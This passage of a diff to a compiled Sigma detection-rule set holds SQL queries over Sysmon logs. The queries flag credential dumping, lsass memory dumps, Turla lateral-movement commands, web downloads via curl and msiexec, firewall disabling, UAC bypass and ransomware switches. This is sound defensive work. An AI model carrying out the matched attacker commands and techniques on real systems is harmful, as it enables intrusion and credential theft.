'\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_download_com_cradles.yml" + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" }, { - "title": "HackTool - ADCSPwn Execution", - "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", + "title": "HackTool - Windows Credential Editor (WCE) Execution", + "id": "7aa7009a-28b9-4344-8c1f-159489a390df", "status": "test", - "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "description": "Detects the use of Windows Credential Editor (WCE)", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1557.001" + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ - "Unlikely" + "Another service that uses a single -s command line switch" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_adcspwn.yml" + "filename": "proc_creation_win_hktl_wce.yml" }, { - "title": "Direct Autorun Keys Modification", - "id": "24357373-078f-44ed-9ac4-6d334a668a11", + "title": "Turla Group Lateral Movement", + "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", "status": "test", - "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", + "description": "Detects automated lateral movement by Turla group", + "author": "Markus Neis", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' OR CommandLine LIKE '%\\\\system\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_direct_asep_registry_keys_modification.yml" + "filename": "proc_creation_win_apt_turla_commands_critical.yml" }, { - "title": "New Firewall Rule Added Via Netsh.EXE", - "id": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "title": "Potential Arbitrary DLL Load Using Winword", + "id": "f7375e28-5c14-432f-b8d1-1db26c832df3", "status": "test", - "description": "Detects the addition of a new rule to the Windows firewall via netsh", - "author": "Markus Neis, Sander Wiebing", + "description": "Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1202" ], "falsepositives": [ - "Legitimate administration activity", - "Software installations and removal" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% firewall %' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\' OR CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\thor64.exe' ESCAPE '\\' AND CommandLine LIKE '%advfirewall firewall show rule name=all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_fw_add_rule.yml" + "filename": "proc_creation_win_office_winword_dll_load.yml" }, { - "title": "Rar Usage with Password and Compression Level", - "id": "faa48cae-6b25-4f00-a094-08947fef582f", + "title": "MsiExec Web Install", + "id": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", "status": "test", - "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", - "author": "@ROxPinTeddy", + "description": "Detects suspicious msiexec process starts with web addresses as parameter", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1218.007", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate use of Winrar command line version", - "Other command line tools, that use these flags" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% msiexec%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rar_compression_with_password.yml" + "filename": "proc_creation_win_msiexec_web_install.yml" }, { - "title": "HackTool - CrackMapExec PowerShell Obfuscation", - "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", - "status": "test", - "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", - "author": "Thomas Patzke", + "title": "Suspicious Curl.EXE Download", + "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "status": "experimental", + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027.005" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" + "filename": "proc_creation_win_curl_susp_download.yml" }, { - "title": "Firewall Disabled via Netsh.EXE", - "id": "57c4bf16-227f-4394-8ec7-1b745ee061c3", - "status": "test", - "description": "Detects netsh commands that turns off the Windows firewall", - "author": "Fatih Sirin", + "title": "WSL Child Process Anomaly", + "id": "2267fe65-0681-42ad-9a6d-46553d3f3480", + "status": "experimental", + "description": "Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1562.004", - "attack.s0108" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%opmode%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%state%' ESCAPE '\\' AND CommandLine LIKE '%off%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wslhost.exe' ESCAPE '\\') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_fw_disable.yml" + "filename": "proc_creation_win_wsl_child_processes_anomalies.yml" }, { - "title": "PUA - Ngrok Execution", - "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", + "title": "IIS Native-Code Module Command Line Installation", + "id": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", "status": "test", - "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "description": "Detects suspicious IIS native-code module installations via command line", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Another tool that uses the command line switches of Ngrok", - "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (Image LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' AND CommandLine LIKE '%module%' ESCAPE '\\' AND (CommandLine LIKE '%/name:%' ESCAPE '\\' OR CommandLine LIKE '%-name:%' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_ngrok.yml" + "filename": "proc_creation_win_iis_appcmd_susp_module_install.yml" }, { - "title": "Execution from Suspicious Folder", - "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "title": "Use of TTDInject.exe", + "id": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", "status": "experimental", - "description": "Detects a suspicious execution from an uncommon folder", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%ttdinject.exe' ESCAPE '\\' OR OriginalFileName = 'TTDInject.EXE'))" ], - "filename": "proc_creation_win_susp_execution_path.yml" + "filename": "proc_creation_win_lolbin_ttdinject.yml" }, { - "title": "Process Access via TrolleyExpress Exclusion", - "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", - "status": "experimental", - "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Devtoolslauncher.exe Executes Specified Binary", + "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", + "status": "test", + "description": "The Devtoolslauncher.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", "tags": [ "attack.defense_evasion", - "attack.t1218.011", - "attack.credential_access", - "attack.t1003.001" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use of devtoolslauncher.exe by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (Image LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" + "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" }, { - "title": "Potential Conti Ransomware Activity", - "id": "689308fc-cfba-4f72-9897-796c1dc61487", - "status": "test", - "description": "Detects a specific command used by the Conti ransomware group", - "author": "frack113", + "title": "Delete All Scheduled Tasks", + "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "status": "experimental", + "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.impact", - "attack.s0575", - "attack.t1486" + "attack.t1489" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" + "filename": "proc_creation_win_schtasks_delete_all.yml" }, { - "title": "Arbitrary Shell Command Execution Via Settingcontent-Ms", - "id": "24de4f3b-804c-4165-b442-5a06a2302c7e", - "status": "experimental", - "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", - "author": "Sreeman", + "title": "Suspicious Tasklist Discovery Command", + "id": "63332011-f057-496c-ad8d-d2b6afb27f96", + "status": "test", + "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network", + "author": "frack113", "tags": [ - "attack.t1204", - "attack.t1566.001", - "attack.execution", - "attack.initial_access" + "attack.discovery", + "attack.t1057" ], "falsepositives": [ - "Unknown" + "Administrator, hotline ask to user" ], - "level": "medium", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%.SettingContent-ms%' ESCAPE '\\' AND NOT (CommandLine LIKE '%immersivecontrolpanel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%tasklist%' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR OriginalFileName = 'tasklist.exe'))" ], - "filename": "proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml" + "filename": "proc_creation_win_tasklist_basic_execution.yml" }, { - "title": "Procdump Execution", - "id": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", - "status": "experimental", - "description": "Detects usage of the SysInternals Procdump utility", - "author": "Florian Roth (Nextron Systems)", + "title": "Domain Trust Discovery Via Dsquery", + "id": "3bad990e-4848-4a78-9530-b427d854aac0", + "status": "test", + "description": "Detects execution of \"dsquery.exe\" for domain trust discovery", + "author": "E.M. Anhaus, Tony Lambert, oscd.community, omkar72", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Legitimate use of procdump by a developer or administrator" + "Legitimate use of the utilities by legitimate user for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR OriginalFileName = 'dsquery.exe') AND CommandLine LIKE '%trustedDomain%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_procdump.yml" + "filename": "proc_creation_win_dsquery_domain_trust_discovery.yml" }, { - "title": "Proxy Execution via Wuauclt", - "id": "af77cf95-c469-471c-b6a0-946c685c4798", + "title": "UAC Bypass Using PkgMgr and DISM", + "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_lolbin_wuauclt.yml" + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" }, { - "title": "PUA - RunXCmd Execution", - "id": "93199800-b52a-4dec-b762-75212c196542", - "status": "test", - "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", - "author": "Florian Roth (Nextron Systems)", + "title": "Use Of The SFTP.EXE Binary As A LOLBIN", + "id": "a85ffc3a-e8fd-4040-93bf-78aff284d801", + "status": "experimental", + "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1218" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sftp.exe' ESCAPE '\\' AND (CommandLine LIKE '% -D ..%' ESCAPE '\\' OR CommandLine LIKE '% -D C:\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_runxcmd.yml" + "filename": "proc_creation_win_lolbin_sftp.yml" }, { - "title": "Malicious PowerShell Commandlets - ProcessCreation", - "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", - "status": "experimental", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "VolumeShadowCopy Symlink Creation Via Mklink", + "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", + "status": "stable", + "description": "Shadow Copies storage symbolic link creation using operating systems utilities", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - 